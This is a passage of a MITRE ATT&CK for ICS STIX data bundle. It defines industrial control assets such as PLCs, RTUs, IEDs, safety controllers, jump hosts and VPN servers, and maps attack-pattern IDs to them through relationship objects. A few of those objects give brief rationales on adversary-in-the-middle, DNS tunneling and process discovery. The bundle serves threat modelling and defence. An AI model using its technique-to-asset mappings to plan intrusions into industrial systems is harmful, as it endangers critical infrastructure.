"x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "created": "2023-09-28T14:38:54.407Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0002", "external_id": "A0002"}, {"source_name": "IEC February 2019", "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", "url": "https://webstore.iec.ch/publication/34421"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-05-30T15:21:30.103Z", "name": "Identity and Access Management (Windows, Azure AD, Entra ID)", "description": "", "x_mitre_sectors": [], "x_mitre_related_assets": [{"name": "Domain Controller", "related_asset_sectors": ["General"], "description": ""}], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Windows"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", "created": "2024-05-30T15:21:14.137Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0017", "external_id": "A0017"}], "object_marking_refs": []}, {"modified": "2023-10-04T18:01:02.506Z", "name": "Intelligent Electronic Device (IED)", "description": "An Intelligent Electronic Device (IED) is a type of specialized field device that is designed to perform specific operational functions, frequently for protection, monitoring, or control within the electric sector. IEDs are typically used to both acquire telemetry and execute tailored control algorithms/actions based on customizable parameters/settings. An IED is usually implemented as a dedicated embedded device and supports various network automation protocols to communicate with RTUs and Control Servers.", "x_mitre_sectors": ["Electric"], "x_mitre_related_assets": [{"name": "Protection Relay", "related_asset_sectors": ["Electric"], "description": "A protection relay is a type of IED used within the electric sector to monitor for faults or problematic operating conditions on power lines, busses, or transformers. While traditionally protection relays were electromechanical or electromagnetic devices, modern relays utilize microprocessors, embedded operating system, and SCADA communications."}, {"name": "Field Device / Controller", "related_asset_sectors": [], "description": "IEDs may be referred to as Field Controllers or Field Devices as a general function name. "}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "created": "2023-09-28T14:46:42.566Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0005", "external_id": "A0005"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-04T18:03:06.811Z", "name": "Jump Host", "description": "Jump hosts are devices used to support remote management sessions into ICS networks or devices. The system is used to access the ICS environment securely from external networks, such as the corporate network. The user must first remote into the jump host before they can access ICS devices. The jump host may be a customized Windows server using common remote access protocols (e.g., RDP) or a dedicated access management device. The jump host typically performs various security functions to ensure the authenticity of remote sessions, including authentication, enforcing access controls/permissions, and auditing all access attempts. ", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [{"name": "Intermediate System", "related_asset_sectors": ["Electric"], "description": "A Cyber Asset or collection of Cyber Assets performing access control to restrict Interactive Remote Access to only authorized users.(Citation: North American Electric Reliability Corporation June 2021)"}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "created": "2023-09-28T17:52:53.206Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0012", "external_id": "A0012"}, {"source_name": "North American Electric Reliability Corporation June 2021", "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-04T18:09:21.296Z", "name": "Programmable Logic Controller (PLC)", "description": "A Programmable Logic Controller (PLC) is an embedded programmable control device. PLCs typically utilize a modular architecture with separate modules used to support its processing capabilities, communication mediums, and I/O interfaces. PLCs allow for the deployment of customized programs/logic to control or monitor an operational process. This logic is defined using industry specific programming languages, such as IEC 61131 (Citation: IEC February 2013), which define the set of tasks and program organizational units (POUs) included in the device\u2019s programs. PLCs also typically have distinct operating modes (e.g., Remote, Run, Program, Stop) which are used to determine when the device can be programmed or whether it should execute the custom logic.", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [{"name": "Process Automation Controller (PAC)", "related_asset_sectors": ["General"], "description": "Process Automation Controllers (PAC) share much of the same functionality as a PLC. PACs may include advanced features for process control, motion control, drive control, and vision applications. PACs may include additional features such as options to program in traditional programming languages such as C and C++ in addition to 61131 programming languages in order to support these more advanced controls. "}, {"name": "Field Device / Controller", "related_asset_sectors": [], "description": "Programmable Logic Controller (PLC) may be referred to as Field Controllers or Field Devices as a general function name. "}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "created": "2023-09-28T14:43:05.105Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0003", "external_id": "A0003"}, {"source_name": "IEC February 2013", "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", "url": "https://webstore.iec.ch/publication/4552"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-04T18:05:43.237Z", "name": "Remote Terminal Unit (RTU)", "description": "A Remote Terminal Unit (RTU) is a device that typically resides between field devices (e.g., PLCs, IEDs) and control/SCADA servers and supports various communication interfacing and data aggregation functions. RTUs are typically responsible for forwarding commands from the control server and the collection of telemetry, events, and alerts from the field devices. An RTU can be implemented as a dedicated embedded device, as software platform that runs on a hardened/ruggedized computer, or using a custom application program on a PLC.", "x_mitre_sectors": ["Electric", "Water and Wastewater", "General"], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Embedded", "Windows", "Linux"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "created": "2023-09-28T14:44:54.756Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0004", "external_id": "A0004"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_related_assets": [], "x_mitre_contributors": []}, {"modified": "2024-05-30T15:29:20.916Z", "name": "Routers and Switches", "description": "A computer that is a gateway between two networks at OSI layer 3 and that relays and directs data packets through that inter-network. The most common form of router operates on IP packets.(Citation: IETF RFC4949 2007)", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "created": "2023-09-29T18:55:09.319Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0014", "external_id": "A0014"}, {"source_name": "IETF RFC4949 2007", "description": "Internet Engineering Task Force. (2007, August). Internet Security Glossary, Version 2. Retrieved September 29, 2023.", "url": "https://www.ietf.org/rfc/rfc4949.txt"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-16T18:49:08.504Z", "name": "Safety Controller", "description": "Safety controllers are typically a type of field device used to perform the safety critical function. Safety controllers often support the deployment of custom programs/logic, similar to a PLC, but can also be tailored for sector specific functions/applications. The safety controllers typically utilize redundant hardware and processors to ensure they operate reliably if a component fails.", "x_mitre_related_assets": [{"name": "Safety Instrumented System (SIS) controller", "related_asset_sectors": [], "description": "SIS controllers are used to \u201ctake the process to a safe state when predetermined conditions are violated\u201d (Citation: Guidance - NIST SP800-82) through the reading of sensor data and interaction with digital/physical control surfaces. These devices are oftentimes located on programmable embedded devices running specialized RTOS or other embedded operating systems. "}, {"name": "Emergency Shutdown Systems (ESD) controller", "related_asset_sectors": [], "description": "Emergency Shutdown System controllers are used to read sensor values and interact with control surfaces to return the system \u201cto a safe static condition so that any remedial action can be taken\u201d. (Citation: SIGTTO ESD 2021)"}, {"name": "Burner Management Systems (BMS) controller", "related_asset_sectors": [], "description": "Burner Management System controllers are used to interact with sensors and control surfaces to maintain safe operating conditions for the burner. These can include safely starting-up and managing the main flame, controlling and monitoring the burning conditions, and safely initiating planned or unplanned shutdown sequences."}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "created": "2023-09-28T15:10:05.534Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0010", "external_id": "A0010"}, {"source_name": "Guidance - NIST SP800-82", "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"}, {"source_name": "SIGTTO ESD 2021", "description": "Society of International Gas Tanker & Terminal Operators Ltd. (2021). ESD Systems: Recommendations for Emergency Shutdown and Related Safety Systems (Second Edition). Retrieved September 28, 2023.", "url": "https://sigtto.org/media/3457/sigtto-2021-esd-systems.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_sectors": [], "x_mitre_contributors": []}, {"modified": "2023-10-04T18:07:59.333Z", "name": "Virtual Private Network (VPN) Server", "description": "A VPN server is a device that is used to establish a secure network tunnel between itself and other remote VPN devices, including field VPNs. VPN servers can be used to establish a secure connection with a single remote device, or to securely bridge all traffic between two separate networks together by encapsulating all data between those networks. VPN servers typically support remote network services that are used by field VPNs to initiate the establishment of the secure VPN tunnel between the field device and server.", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [{"name": "Virtual Private Network (VPN) terminator", "related_asset_sectors": ["General"], "description": "A VPN terminator is a device performs the role of either a VPN client or server to support the establishment of VPN connection. (Citation: IEC February 2019)"}, {"name": "Field VPN", "related_asset_sectors": ["General"], "description": "Field VPN are typically deployed at remote outstations and are used to create secure connections to VPN servers within data/control center environments. "}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "created": "2023-09-28T15:13:07.950Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0011", "external_id": "A0011"}, {"source_name": "IEC February 2019", "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", "url": "https://webstore.iec.ch/publication/34421"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-28T14:23:52.358Z", "name": "Workstation", "description": "Workstations are devices used by human operators or engineers to perform various configuration, programming, maintenance, diagnostic, or operational tasks. Workstations typically utilize standard desktop or laptop hardware and operating systems (e.g., MS Windows), but run dedicated control system applications or diagnostic/management software to support interfacing with the control servers or field devices. Some workstations have a fixed location within the network architecture, while others are transient devices that are directly connected to various field devices to support local management activities.", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [{"name": "Transient Cyber Asset (TCA)", "related_asset_sectors": ["Electric"], "description": "A Transient Cyber Asset (TCA)(Citation: North American Electric Reliability Corporation June 2021) is a mobile workstation that is used to support management functions across multiple different networks, rather than being dedicated to any specific device/network. The TCA is often used to directly manage ICS environments that do not have any dedicated support for external remote access. Therefore, the TCA provides a mechanism for connectivity and file transfer to many networks/devices, even if they are segmented or \u201cair gapped\u201d from other networks. "}, {"name": "Engineering Workstation (EWS)", "related_asset_sectors": ["General"], "description": "An Engineering Workstation (EWS) is used to perform various maintenance, configuration, or diagnostics functions for a control system. The EWS will likely require dedicated application software to interface with various devices (e.g., RTUs, PLCs), and may be used to transfer data or files between the control system devices and other networks. "}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "created": "2023-09-28T14:22:49.837Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0001", "external_id": "A0001"}, {"source_name": "North American Electric Reliability Corporation June 2021", "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--007a2c53-fc5c-4750-aff0-defb282e178a", "created": "2023-09-29T16:30:30.829Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:30:30.829Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d", "created": "2020-02-11T20:36:06.423Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--011f1d16-c9f1-48ac-94f1-165466c155f8", "created": "2023-09-29T18:43:33.176Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:43:33.176Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--012fd76f-1a10-4e48-9306-10ffae3f61dd", "created": "2023-09-29T16:30:58.431Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:30:58.431Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--01335508-22bb-4185-a7e2-49ec9bee6423", "created": "2023-09-28T20:15:20.293Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:15:20.293Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--01d002a2-696a-4e22-b227-b0b32f54eaf0", "created": "2023-09-29T18:42:27.894Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:42:27.894Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02117d44-46d2-41f0-a5fb-ba303e6ee124", "created": "2023-09-29T18:55:47.037Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-23T19:40:55.153Z", "description": "Asset Mapping Rationale: Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique. By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--026ba3e5-ae3b-4a8b-83c0-ea8327cd9e50", "created": "2023-09-29T17:42:44.516Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:42:44.516Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02c0faf7-6969-420f-b9d8-b8eacfefb61e", "created": "2024-05-22T17:25:32.818Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-23T19:43:58.513Z", "description": "Asset Mapping Rationale: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. On network devices, Network Device CLI commands such as show processes can be used to display current running processes.", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02f547fd-2565-4130-a4be-c4ba7b5aeb0c", "created": "2023-09-29T17:59:31.091Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:59:31.091Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02fee6ab-f7a1-4168-919f-63c4f0b3349c", "created": "2020-01-30T17:48:49.751Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--033b4401-261f-498b-89f3-2bad9ff5907a", "created": "2023-09-29T17:58:15.338Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:58:15.338Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0384ef48-ede0-4200-be47-413622f4c690", "created": "2020-01-29T18:12:33.728Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", "target_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--03a3226b-0b28-49a9-860f-a8c13ffbe00d", "created": "2020-03-13T21:03:18.884Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--03aab956-54f3-4e4b-93a7-6d1898d91b57", "created": "2023-09-29T16:29:03.438Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:29:03.438Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--03e94c12-cd51-4f39-a33d-c66a31bbf361", "created": "2023-09-29T17:40:34.866Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:40:34.866Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--042f383d-ce12-4f7f-85ed-ad1410302a07", "created": "2024-05-23T04:04:25.765Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-23T19:54:08.739Z", "description": "Asset Mapping Rationale: Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": 